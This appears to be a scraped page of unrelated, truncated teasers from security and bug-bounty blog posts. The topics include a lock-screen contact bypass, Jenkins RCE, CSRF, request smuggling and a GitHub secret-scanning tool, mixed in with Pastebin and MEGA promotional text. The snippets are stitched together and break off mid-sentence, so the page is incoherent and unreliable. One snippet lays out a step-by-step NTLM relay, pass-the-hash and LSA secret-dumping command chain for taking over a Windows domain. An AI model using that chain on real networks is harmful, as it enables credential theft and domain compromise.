A bug allows anyone who has the victim’s phone to read all their contact list without unlocking the security lock

Once upon a time, a friend of mine asked me a question — "Do you know any fresh RCE for the Jenkins environment ?". I was informed already…

So you guys must be aware of CSRF attack, if not then here is a short intro:

Pentest Handy Tips and Tricks - part 2.

Collection great groups, channels, bots and libraries for Telegram - ebertti/awesome-telegram

Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.

Hi sobat, bagaimana kabarnya ? semoga senantiasa sehat selalu dan diberikan kelancaran dalam aktifitasnya. ^-^

Introduction

How I got Domain Admin today. Relay creds>SAM dump>PTH> read cleartxt 1) cme smb <CIDR> --gen-relay-list smbrelay.txt 2) ntlmrelayx.py -tf smbrelay.txt 3) Wait for admin hash (500) 4) cme smb <CIDR> -u username -H NTHASH --lsa 5) cat /root/.cme/logs/*.secrets…

Taregt : redacted.com

gitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe... - hisxo...

Introduction

Hi guy I am back with another POC that I found in PRIVATE program on bugcrowd let get started. So let assume the SITE name private.com I…

This article about how I found two sites for HTTP Request Smuugling

Hi there again,

I followed the usual Recon process after enumerating subdomains ,

MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now